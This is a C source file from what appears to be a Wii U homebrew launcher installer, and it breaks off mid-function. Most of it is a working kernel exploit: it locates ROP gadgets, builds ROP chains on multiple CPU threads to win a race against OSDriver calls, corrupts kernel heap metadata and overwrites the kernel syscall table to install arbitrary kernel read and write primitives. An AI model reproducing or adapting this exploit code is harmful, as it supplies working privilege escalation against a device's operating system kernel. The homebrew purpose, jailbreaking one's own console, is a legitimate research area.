homebrew_launcher/installer/kexploit.c

#include "kexploit.h"

void wait(unsigned int coreinit_handle, unsigned int t);
void doBrowserShutdown(unsigned int coreinit_handle);
void setupOSScreen(unsigned int coreinit_handle);
void printOSScreenMsg(unsigned int coreinit_handle, char *buf,unsigned int pos);
void exitOSScreen(unsigned int coreinit_handle);
void callSysExit(unsigned int coreinit_handle, void *sysFunc);

#if (VER >= 532)
/* Initial setup code stolen from Pong, makes race much more reliable */
void run_kexploit(private_data_t *private_data)
{
	/* Get a handle to coreinit.rpl and gx2.rpl */
	unsigned int coreinit_handle = private_data->coreinit_handle;
	unsigned int gx2_handle = 0;
	OSDynLoad_Acquire("gx2.rpl", &gx2_handle);

    //needed to not destroy screen
    doBrowserShutdown(coreinit_handle);

	/* Exit functions */
	void (*__PPCExit)();
	void (*_Exit)(int);
	OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit);
	OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);

	/* Memory functions */
	void (*DCFlushRange)(void *buffer, uint32_t length);
	void (*DCInvalidateRange)(void *buffer, uint32_t length);
	void (*DCTouchRange)(void *buffer, uint32_t length);
	uint32_t (*OSEffectiveToPhysical)(void *vaddr);
	void* (*OSAllocFromSystem)(uint32_t size, int align);
	void (*OSFreeToSystem)(void *ptr);
	OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
	OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
	OSDynLoad_FindExport(coreinit_handle, 0, "DCTouchRange", &DCTouchRange);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSEffectiveToPhysical", &OSEffectiveToPhysical);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);

	/* OS thread functions */
	bool (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t stack, uint32_t stack_size, int priority, uint16_t attr);
	int (*OSResumeThread)(void *thread);
	void (*OSExitThread)();
    int (*OSIsThreadTerminated)(void *thread);
    void (*OSYieldThread)(void);

	OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSYieldThread", &OSYieldThread);

	/* OSDriver functions */
	uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020};
	uint32_t (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
	uint32_t dereg[] = {0x38003300, 0x44000002, 0x4E800020};
	uint32_t (*Deregister)(char *driver_name, uint32_t name_length) = find_gadget(dereg, 0xc, (uint32_t) __PPCExit);
	uint32_t copyfrom[] = {0x38004700, 0x44000002, 0x4E800020};
	uint32_t (*CopyFromSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length) = find_gadget(copyfrom, 0xc, (uint32_t) __PPCExit);
	uint32_t copyto[] = {0x38004800, 0x44000002, 0x4E800020};
	uint32_t (*CopyToSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length) = find_gadget(copyto, 0xc, (uint32_t) __PPCExit);

	/* GX2 functions */
	void (*GX2SetSemaphore)(uint64_t *sem, int action);
	void (*GX2Flush)(void);
	OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", &GX2SetSemaphore);
	OSDynLoad_FindExport(gx2_handle, 0, "GX2Flush", &GX2Flush);

	/* Allocate space for DRVHAX */
	uint32_t *drvhax = OSAllocFromSystem(0x4c, 4);

	/* Set the kernel heap metadata entry */
	uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
	metadata[0] = (uint32_t)drvhax;
	metadata[1] = (uint32_t)-0x4c;
	metadata[2] = (uint32_t)-1;
	metadata[3] = (uint32_t)-1;

	/* Find some gadgets */
	uint32_t gx2data[] = {0xfc2a0000};
	uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
	uint32_t r3r4load[] = {0x80610008, 0x8081000C, 0x80010014, 0x7C0803A6, 0x38210010, 0x4E800020};
	uint32_t r3r4load_addr = (uint32_t) find_gadget(r3r4load, 0x18, 0x01000000);
	uint32_t r30r31load[] = {0x80010014, 0x83e1000c, 0x7c0803a6, 0x83c10008, 0x38210010, 0x4e800020};
	uint32_t r30r31load_addr = (uint32_t) find_gadget(r30r31load, 0x18, 0x01000000);
	uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
	uint32_t doflush_addr = (uint32_t) find_gadget(doflush, 0x2C, 0x01000000) + 0x14 + 0x18;

	/* Modify a next ptr on the heap */
	uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;

	/* Make a thread to modify the semaphore */
	OSContext *thread = (OSContext*)private_data->MEMAllocFromDefaultHeapEx(0x1000, 8);
	uint32_t *stack = (uint32_t*)private_data->MEMAllocFromDefaultHeapEx(0xA0, 0x20);
	if (!OSCreateThread(thread, (void*)0x11a1dd8, 0, NULL, ((uint32_t)stack) + 0xA0, 0xA0, 0, 0x1 | 0x8)) OSFatal("Failed to create thread");

	/* Set up the ROP chain */
	thread->gpr[1] = (uint32_t)stack;
	thread->gpr[3] = kpaddr;
	thread->gpr[30] = gx2data_addr;
	thread->gpr[31] = 1;
	thread->srr0 = ((uint32_t)GX2SetSemaphore) + 0x2C;

	stack[0x24/4] = r30r31load_addr;					/* Load r30/r31 - stack=0x20 */
	stack[0x28/4] = gx2data_addr;						/* r30 = GX2 data area */
	stack[0x2c/4] = 1;									/* r31 = 1 (signal) */

	stack[0x34/4] = r3r4load_addr;						/* Load r3/r4 - stack=0x30 */
	stack[0x38/4] = kpaddr;

	stack[0x44/4] = ((uint32_t)GX2SetSemaphore) + 0x2C;	/* GX2SetSemaphore() - stack=0x40 */

	stack[0x64/4] = r30r31load_addr;					/* Load r30/r31 - stack=0x60 */
	stack[0x68/4] = 0x100;								/* r30 = r3 of do_flush = 0x100 */
	stack[0x6c/4] = 1;									/* r31 = r4 of do_flush = 1 */

	stack[0x74/4] = doflush_addr;						/* do_flush() - stack=0x70 */

	stack[0x94/4] = (uint32_t)OSExitThread;

	DCFlushRange(thread, 0x1000);
	DCFlushRange(stack, 0x1000);

	/* Start the thread */
	OSResumeThread(thread);

	/* Wait for a while */
    while(OSIsThreadTerminated(thread) == 0)
    {
        OSYieldThread();
    }

	/* Free stuff */
	private_data->MEMFreeToDefaultHeap(thread);
	private_data->MEMFreeToDefaultHeap(stack);

	/* Register a new OSDriver, DRVHAX */
	char drvname[6] = {'D', 'R', 'V', 'H', 'A', 'X'};
	Register(drvname, 6, NULL, NULL);

	/* Modify its save area to point to the kernel syscall table */
	drvhax[0x44/4] = KERN_SYSCALL_TBL + (0x34 * 4);

	/* Use DRVHAX to install the read and write syscalls */
	uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
	CopyToSaveArea(drvname, 6, syscalls, 8);

	/* Clean up the heap and driver list so we can exit */
	kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0);
	kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]);

	/* Modify the kernel address table and exit */
	//kern_write(KERN_ADDRESS_TBL + 0x12, 0x31000000);
	//kern_write(KERN_ADDRESS_TBL + 0x13, 0x28305800);
}

#else
typedef struct
{
    char *drvb_name;
    void *copy_payload;
    void *thread0;
    void *thread2;
    uint32_t *rop0;
    uint32_t *rop2;

    void (*OSYieldThread)(void);
    int32_t (*OSResumeThread)(void * thread);
    uint32_t (*CopyToSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length);
} thread_data_container_t;

static void thread_callback(int argc, void *argv)
{
    thread_data_container_t *container = (thread_data_container_t*)argv;

    container->OSYieldThread();

    /* Schedule both threads for execution */
    container->OSResumeThread(container->thread0);
    container->OSResumeThread(container->thread2);

    /* Signal the CPU0 and CPU2 threads to begin */
    container->rop0[0x1fc/4] = 0;
    container->rop2[0x1ac/4] = 0;

    container->OSYieldThread();

    container->CopyToSaveArea(container->drvb_name, 4,  container->copy_payload, 0x1000);
}


/* Initial setup code stolen from Pong, makes race much more reliable */
void run_kexploit(private_data_t *private_data)
{
    unsigned int coreinit_handle, sysapp_handle;
    OSDynLoad_Acquire("coreinit", &coreinit_handle);
    OSDynLoad_Acquire("sysapp", &sysapp_handle);
    //needed to not destroy screen
    doBrowserShutdown(coreinit_handle);
    //prints out first message as well
    setupOSScreen(coreinit_handle);

    if(KERN_SYSCALL_TBL == 0)
    {
        printOSScreenMsg(coreinit_handle, "Your kernel version has not been implemented yet.",1);
        wait(coreinit_handle, 0x3FFFF);
        exitOSScreen(coreinit_handle);
    }

    //OS Memory functions
    void*(*memset)(void *dest, uint32_t value, uint32_t bytes);
    void*(*memcpy)(void *dest, void *src, uint32_t length);
    void*(*OSAllocFromSystem)(uint32_t size, int align);
    void (*OSFreeToSystem)(void *ptr);
    void (*DCFlushRange)(void *buffer, uint32_t length);
    void (*DCInvalidateRange)(void *buffer, uint32_t length);
    void (*ICInvalidateRange)(void *buffer, uint32_t length);

    /* OS thread functions */
    bool (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t stack, uint32_t stack_size, int32_t priority, uint16_t attr);
    int32_t (*OSResumeThread)(void *thread);
    int32_t (*OSGetThreadPriority)(void *thread);
    void * (*OSGetCurrentThread)(void);
    void (*OSYieldThread)(void);
    int (*OSIsThreadTerminated)(void *thread);

    /* Exit functions */
    void (*__PPCExit)();
    void (*_Exit)();

    int(*SYSSwitchToBrowser)(void *args);
    int(*SYSLaunchSettings)(void *args);

    /* Read the addresses of the functions */
    OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset);
    OSDynLoad_FindExport(coreinit_handle, 0, "memcpy", &memcpy);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "ICInvalidateRange", &ICInvalidateRange);

    OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSGetThreadPriority", &OSGetThreadPriority);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSGetCurrentThread", &OSGetCurrentThread);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSYieldThread", &OSYieldThread);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);

    OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit);
    OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);

    OSDynLoad_FindExport(sysapp_handle, 0, "SYSSwitchToBrowser", &SYSSwitchToBrowser);
    OSDynLoad_FindExport(sysapp_handle, 0, "SYSLaunchSettings", &SYSLaunchSettings);

    /* Allocate a stack for the threads */
    uint32_t stack0 = (uint32_t) private_data->MEMAllocFromDefaultHeapEx(0x300, 0x20);
    uint32_t stack2 = (uint32_t) private_data->MEMAllocFromDefaultHeapEx(0x300, 0x20);
    uint32_t stack1 = (uint32_t) private_data->MEMAllocFromDefaultHeapEx(0x300, 0x20);

    /* Create the threads */
    void *thread0 = private_data->MEMAllocFromDefaultHeapEx(OSTHREAD_SIZE, 8);
    bool ret0 = OSCreateThread(thread0, _Exit, 0, NULL, stack0 + 0x300, 0x300, 0, 1 | 0x10 | 8);
    void *thread2 = private_data->MEMAllocFromDefaultHeapEx(OSTHREAD_SIZE, 8);
    bool ret2 = OSCreateThread(thread2, _Exit, 0, NULL, stack2 + 0x300, 0x300, 0, 4 | 0x10 | 8);
    void *thread1 = private_data->MEMAllocFromDefaultHeapEx(OSTHREAD_SIZE, 8);
    if (ret0 == false || ret2 == false)
    {
        printOSScreenMsg(coreinit_handle, "Failed to create threads! Please try again.",1);
        wait(coreinit_handle, 0x3FFFF);
        exitOSScreen(coreinit_handle);
    }

    printOSScreenMsg(coreinit_handle, "Running Exploit...",1);

    /* Find a bunch of gadgets */
    uint32_t sleep_addr;
    OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &sleep_addr);
    sleep_addr += 0x44;
    uint32_t sigwait[] = {0x801F0000, 0x7C0903A6, 0x4E800421, 0x83FF0004, 0x2C1F0000, 0x4082FFEC, 0x80010014, 0x83E1000C, 0x7C0803A6, 0x38210010, 0x4E800020};
    uint32_t sigwait_addr = (uint32_t) find_gadget(sigwait, 0x2c, (uint32_t) __PPCExit);
    uint32_t r3r4load[] = {0x80610008, 0x8081000C, 0x80010014, 0x7C0803A6, 0x38210010, 0x4E800020};
    uint32_t r3r4load_addr = (uint32_t) find_gadget(r3r4load, 0x18, (uint32_t) __PPCExit);
    uint32_t r5load[] = {0x80A10008, 0x38210010, 0x7CA32B78, 0x80810004, 0x7C8803A6, 0x4E800020};
    uint32_t r5load_addr = (uint32_t) find_gadget(r5load, 0x18, (uint32_t) __PPCExit);
    uint32_t r6load[] = {0x80C10014, 0x90610010, 0x80010010, 0x915E002C, 0x81210008, 0x901E0030, 0x913E0028, 0x90DE0034, 0x80010034, 0x83E1002C, 0x7C0803A6, 0x83C10028, 0x38210030, 0x4E800020};
    uint32_t r6load_addr = (uint32_t) find_gadget(r6load, 0x38, (uint32_t) __PPCExit);
    uint32_t r30r31load[] = {0x80010034, 0x83E1002C, 0x7C0803A6, 0x83C10028, 0x38210030, 0x4E800020};
    uint32_t r30r31load_addr = (uint32_t) find_gadget(r30r31load, 0x18, (uint32_t) __PPCExit);

    /* Find the OSDriver functions */
    uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020};
    uint32_t (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
    uint32_t dereg[] = {0x38003300, 0x44000002, 0x4E800020};
    uint32_t (*Deregister)(char *driver_name, uint32_t name_length) = find_gadget(dereg, 0xc, (uint32_t) __PPCExit);
    uint32_t copyfrom[] = {0x38004700, 0x44000002, 0x4E800020};
    uint32_t (*CopyFromSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length) = find_gadget(copyfrom, 0xc, (uint32_t) __PPCExit);
    uint32_t copyto[] = {0x38004800, 0x44000002, 0x4E800020};
    uint32_t (*CopyToSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length) = find_gadget(copyto, 0xc, (uint32_t) __PPCExit);

    /* Set up the ROP chain for CPU0 */
    OSContext *ctx0 = (OSContext*) thread0;
    uint32_t *rop0 = (uint32_t*) stack0;
    ctx0->gpr[1] = stack0 + 0x80;
    ctx0->gpr[28] = 0;
    ctx0->gpr[29] = CPU0_WAIT_TIME * 2;
    ctx0->gpr[31] = stack0 + 0x1f8;
    ctx0->srr0 = sigwait_addr + 0xc;
    rop0[0x94/4] = sleep_addr;
    rop0[0x114/4] = r3r4load_addr;
    rop0[0x118/4] = stack0 + 0x208;
    rop0[0x11c/4] = 4;
    rop0[0x124/4] = r30r31load_addr;
    rop0[0x14c/4] = stack0 + 0x220;
    rop0[0x154/4] = sigwait_addr;
    rop0[0x164/4] = r5load_addr;
    rop0[0x168/4] = stack0 + 0x218;
    rop0[0x174/4] = r3r4load_addr;
    rop0[0x178/4] = stack0 + 0x210;
    rop0[0x17c/4] = 4;
    rop0[0x184/4] = r30r31load_addr;
    rop0[0x1a8/4] = stack0 + 0x230;
    rop0[0x1b4/4] = r6load_addr;
    rop0[0x1c4/4] = stack0 + 0x21c;
    rop0[0x1dc/4] = stack0 + 0x228;
    rop0[0x1e4/4] = sigwait_addr;
    rop0[0x1f4/4] = sigwait_addr + 0x28;
    rop0[0x1f8/4] = sigwait_addr + 0xc;
    rop0[0x1fc/4] = stack0 + 0x1f8;
    rop0[0x200/4] = 0;
    rop0[0x204/4] = 0;
    rop0[0x208/4] = 0x44525642;
    rop0[0x20c/4] = 0;
    rop0[0x210/4] = 0x44525643;
    rop0[0x214/4] = 0;
    rop0[0x218/4] = 0;
    rop0[0x21c/4] = 0;
    rop0[0x220/4] = (uint32_t)Deregister;
    rop0[0x224/4] = 0;
    rop0[0x228/4] = (uint32_t)Register;
    rop0[0x22c/4] = 0;

    /* Set up the ROP chain for CPU2 */
    OSContext *ctx2 = (OSContext*) thread2;
    uint32_t *rop2 = (uint32_t*) stack2;
    ctx2->gpr[1] = stack2 + 0x80;
    ctx2->gpr[28] = 0;
    ctx2->gpr[29] = CPU2_WAIT_TIME * 4;
    ctx2->gpr[31] = stack2 + 0x1a8;
    ctx2->srr0 = sigwait_addr + 0xc;
    rop2[0x94/4] = sleep_addr;
    rop2[0x114/4] = r5load_addr;
    rop2[0x118/4] = stack2 + 0x204;
    rop2[0x124/4] = r3r4load_addr;
    rop2[0x128/4] = stack2 + 0x1b8;
    rop2[0x12c/4] = 4;
    rop2[0x134/4] = r30r31load_addr;
    rop2[0x158/4] = stack2 + 0x1c8;
    rop2[0x164/4] = r6load_addr;
    rop2[0x174/4] = 4;
    rop2[0x18c/4] = stack2 + 0x1c0;
    rop2[0x194/4] = sigwait_addr;
    rop2[0x1a4/4] = sigwait_addr + 0x28;
    rop2[0x1a8/4] = sigwait_addr + 0xc;
    rop2[0x1ac/4] = stack2 + 0x1a8;
    rop2[0x1b0/4] = 0;
    rop2[0x1b4/4] = 0;
    rop2[0x1b8/4] = 0x44525641;
    rop2[0x1bc/4] = 0;
    rop2[0x1c0/4] = (uint32_t)CopyToSaveArea;
    rop2[0x1c4/4] = 0;
    rop2[0x204/4] = 0xDEADC0DE;

    /* Register driver A and driver B */
    char *drva_name = private_data->MEMAllocFromDefaultHeapEx(8, 4);
    memcpy(drva_name, "DRVA", 5);
    char *drvb_name = private_data->MEMAllocFromDefaultHeapEx(8, 4);
    memcpy(drvb_name, "DRVB", 5);
    uint32_t status = Register(drva_name, 4, NULL, NULL) | Register(drvb_name, 4, NULL, NULL);
    if (status != 0)
    {
        printOSScreenMsg(coreinit_handle, "Register() of driver A and B failed! Reloading kernel...",2);
        wait(coreinit_handle, 0x3FFFF);
        callSysExit(coreinit_handle,SYSLaunchSettings);
        exitOSScreen(coreinit_handle);
    }

    /* Generate the copy payload, which writes to syscall_table[0x34] */
    uint32_t *copy_payload = OSAllocFromSystem(0x1000, 0x20);
    if (!copy_payload)
    {
        printOSScreenMsg(coreinit_handle, "Failed to allocate payload! Reloading kernel...",2);
        wait(coreinit_handle, 0x3FFFF);
        callSysExit(coreinit_handle,SYSLaunchSettings);
        exitOSScreen(coreinit_handle);
    }
    copy_payload[0] = 0x01234567;
    copy_payload[0xfb4/4] = 0x44525648;
    copy_payload[0xfb8/4] = 0x41580000;
    copy_payload[0xff4/4] = PFID_BROWSER;
    copy_payload[0xff8/4] = KERN_SYSCALL_TBL + (0x34 * 4);
    DCFlushRange(copy_payload, 0x1000);
    DCInvalidateRange(copy_payload, 0x1000);

    char *drvhax_name = private_data->MEMAllocFromDefaultHeapEx(8, 4);
    drvhax_name[7] = 0;
    memcpy(drvhax_name, "DRVHAX", 7);
    uint32_t *syscalls = private_data->MEMAllocFromDefaultHeapEx(8, 4);
    syscalls[0] = KERN_CODE_READ;
    syscalls[1] = KERN_CODE_WRITE;

    /* Do a dummy copy to put CopyToSaveArea() in our cache */
    CopyToSaveArea(drvb_name, 4, (void*)0xC0000004, 4);

    thread_data_container_t container;
    container.drvb_name = drvb_name;
    container.copy_payload = copy_payload;
    container.rop0 = rop0;
    container.rop2 = rop2;
    container.thread0 = thread0;
    container.thread2 = thread2;
    container.OSResumeThread = OSResumeThread;
    container.OSYieldThread = OSYieldThread;
    container.CopyToSaveArea = CopyToSaveArea;

    bool ret3 = OSCreateThread(thread1, thread_callback, 1, &container, stack1 + 0x300, 0x300, OSGetThreadPriority(OSGetCurrentThread()), 2 | 0x10 | 8);

    OSYieldThread();
    /* Schedule both threads for execution */
    //OSResumeThread(thread0);
    //OSResumeThread(thread2);
    OSResumeThread(thread1);


    /* Signal the CPU0 and CPU2 threads to begin */
    //rop2[0x1ac/4] = 0;
    //rop0[0x1fc/4] = 0;

    /* Start copying the payload into driver B's save area */
    //CopyToSaveArea(drvb_name, 4, copy_payload, 0x1000);

    /* The amount of instructions in this loop and the sleep ticks of the other cores can decide whether its a success or not  */
    while(OSIsThreadTerminated(thread1) == 0)
    {
        asm volatile (
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        );

        OSYieldThread();
    }

    /* Use DRVHAX to install the read and write syscalls */
    status = CopyToSaveArea(drvhax_name, 6, syscalls, 8);

    /* Verify that the syscalls were installed */
    uint32_t result = 42;
    status = CopyFromSaveArea(drvhax_name, 6, &result, 4);
    if (result != KERN_CODE_READ)
    {
        printOSScreenMsg(coreinit_handle, "Race attack failed! Reloading kernel...",2);
        wait(coreinit_handle, 0x3FFFF);
        callSysExit(coreinit_handle,SYSLaunchSettings);
        exitOSScreen(coreinit_handle);
    }

    /* Search the kernel heap for DRVA and DRVHAX */
    uint32_t drva_addr = 0, drvhax_addr = 0;
    uint32_t metadata_addr = KERN_HEAP + 0x14 + (kern_read((void*)(KERN_HEAP + 0x0c)) * 0x10);
    while (metadata_addr >= KERN_HEAP + 0x14)
    {
        /* Read the data address from the metadata, then read the data */
        uint32_t data_addr = kern_read((void*)metadata_addr);
        uint32_t data = kern_read((void*)data_addr);

        /* Check for DRVA or DRVHAX, and if both are found, break */
        if (data == 0x44525641) drva_addr = data_addr;
        else if (data == 0x44525648) drvhax_addr = data_addr;
        if (drva_addr && drvhax_addr) break;

        /* Go to the previous metadata entry */
        metadata_addr -= 0x10;
    }
    if (!(drva_addr && drvhax_addr))
    {
        printOSScreenMsg(coreinit_handle, "Failed to find DRVA or DRVHAX! Reloading kernel...",2);
        wait(coreinit_handle, 0x3FFFF);
        callSysExit(coreinit_handle,SYSLaunchSettings);
        exitOSScreen(coreinit_handle);
    }
    /* Make DRVHAX point to DRVA to ensure a clean exit */
    kern_write((void*)(drvhax_addr + 0x48), drva_addr);

    private_data->MEMFreeToDefaultHeap(thread0);
    private_data->MEMFreeToDefaultHeap(thread1);
    private_data->MEMFreeToDefaultHeap(thread2);
    private_data->MEMFreeToDefaultHeap((void*)stack0);
    private_data->MEMFreeToDefaultHeap((void*)stack1);
    private_data->MEMFreeToDefaultHeap((void*)stack2);

    //printOSScreenMsg(coreinit_handle, "Success! Re-launch HBL again...",2);
    //wait(coreinit_handle, 0x3FFFF);
    //callSysExit(coreinit_handle,SYSSwitchToBrowser);
    //exitOSScreen(coreinit_handle);
}
#endif


void wait(unsigned int coreinit_handle, unsigned int t)
{
    void (*OSYieldThread)(void);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSYieldThread", &OSYieldThread);

    while(t--)
    {
        OSYieldThread();
    }
}

void doBrowserShutdown(unsigned int coreinit_handle)
{
    void*(*memset)(void *dest, uint32_t value, uint32_t bytes);
    void*(*OSAllocFromSystem)(uint32_t size, int align);
    void (*OSFreeToSystem)(void *ptr);

    int(*IM_SetDeviceState)(int fd, void *mem, int state, int a, int b);
    int(*IM_Close)(int fd);
    int(*IM_Open)();

    OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);

    OSDynLoad_FindExport(coreinit_handle, 0, "IM_SetDeviceState", &IM_SetDeviceState);
    OSDynLoad_FindExport(coreinit_handle, 0, "IM_Close", &IM_Close);
    OSDynLoad_FindExport(coreinit_handle, 0, "IM_Open", &IM_Open);

    //Restart system to get lib access
    int fd = IM_Open();
    void *mem = OSAllocFromSystem(0x100, 64);
    memset(mem, 0, 0x100);
    //set restart flag to force quit browser
    IM_SetDeviceState(fd, mem, 3, 0, 0);
    IM_Close(fd);
    OSFreeToSystem(mem);
    //wait a bit for browser end
    wait(coreinit_handle, 0x3FFFF);
}

void drawString(unsigned int coreinit_handle, int x, int y, char * string)
{
    unsigned int(*OSScreenPutFontEx)(unsigned int bufferNum, unsigned int posX, unsigned int posY, void * buffer);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenPutFontEx", &OSScreenPutFontEx);
    OSScreenPutFontEx(0, x, y, string);
    OSScreenPutFontEx(1, x, y, string);
}

void fillScreen(unsigned int coreinit_handle, char r,char g,char b,char a)
{
    unsigned int(*OSScreenClearBufferEx)(unsigned int bufferNum, unsigned int temp);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenClearBufferEx", &OSScreenClearBufferEx);
    uint32_t num = (r << 24) | (g << 16) | (b << 8) | a;
    OSScreenClearBufferEx(0, num);
    OSScreenClearBufferEx(1, num);
}

void flipBuffers(unsigned int coreinit_handle)
{
    void(*DCFlushRange)(void *buffer, uint32_t length);
    unsigned int(*OSScreenFlipBuffersEx)(unsigned int bufferNum);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenFlipBuffersEx", &OSScreenFlipBuffersEx);
    unsigned int(*OSScreenGetBufferSizeEx)(unsigned int bufferNum);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenGetBufferSizeEx", &OSScreenGetBufferSizeEx);
    //Grab the buffer size for each screen (TV and gamepad)
    int buf0_size = OSScreenGetBufferSizeEx(0);
    int buf1_size = OSScreenGetBufferSizeEx(1);
    //Flush the cache
    DCFlushRange((void *)0xF4000000 + buf0_size, buf1_size);
    DCFlushRange((void *)0xF4000000, buf0_size);
    //Flip the buffer
    OSScreenFlipBuffersEx(0);
    OSScreenFlipBuffersEx(1);
}

void printOSScreenMsg(unsigned int coreinit_handle, char *buf,unsigned int pos)
{
    int i;
    for(i=0;i<2;i++)
    {
        fillScreen(coreinit_handle, 0,0,0,0);
        drawString(coreinit_handle, 0,pos,buf);
        flipBuffers(coreinit_handle);
    }
}

void setupOSScreen(unsigned int coreinit_handle)
{
    void(*OSScreenInit)();
    unsigned int(*OSScreenGetBufferSizeEx)(unsigned int bufferNum);
    unsigned int(*OSScreenSetBufferEx)(unsigned int bufferNum, void * addr);

    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenInit", &OSScreenInit);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenGetBufferSizeEx", &OSScreenGetBufferSizeEx);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenSetBufferEx", &OSScreenSetBufferEx);

    //Call the Screen initilzation function.
    OSScreenInit();
    //Grab the buffer size for each screen (TV and gamepad)
    int buf0_size = OSScreenGetBufferSizeEx(0);
    int buf1_size = OSScreenGetBufferSizeEx(1);
    //Set the buffer area.
    OSScreenSetBufferEx(0, (void *)0xF4000000);
    OSScreenSetBufferEx(1, (void *)0xF4000000 + buf0_size);
    //Clear both framebuffers.
    int ii;
    for (ii = 0; ii < 2; ii++)
    {
        fillScreen(coreinit_handle, 0,0,0,0);
        flipBuffers(coreinit_handle);
    }
    printOSScreenMsg(coreinit_handle, "OSDriver Kernel Exploit",0);
}

void exitOSScreen(unsigned int coreinit_handle)
{
    void (*_Exit)();
    OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
    //exit only works like this
    int ii;
    for(ii = 0; ii < 2; ii++)
    {
        fillScreen(coreinit_handle, 0,0,0,0);
        flipBuffers(coreinit_handle);
    }
    _Exit();
}

void callSysExit(unsigned int coreinit_handle, void *sysFunc)
{
    void*(*OSAllocFromSystem)(uint32_t size, int align);
    bool (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t stack, uint32_t stack_size, int32_t priority, uint16_t attr);
    int32_t (*OSResumeThread)(void *thread);
    int (*OSIsThreadTerminated)(void *thread);

    OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);

    uint32_t stack1 = (uint32_t) OSAllocFromSystem(0x300, 0x20);
    void *thread1 = OSAllocFromSystem(OSTHREAD_SIZE, 8);

    OSCreateThread(thread1, sysFunc, 0, NULL, stack1 + 0x300, 0x300, 0, 0x1A);
    OSResumeThread(thread1);
    while(OSIsThreadTerminated(thread1) == 0)
    {
        asm volatile (
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        "    nop\n"
        );
    }
}

/* Simple memcmp() implementation */
int memcmp(void *ptr1, void *ptr2, uint32_t length)
{
    uint8_t *check1 = (uint8_t*) ptr1;
    uint8_t *check2 = (uint8_t*) ptr2;
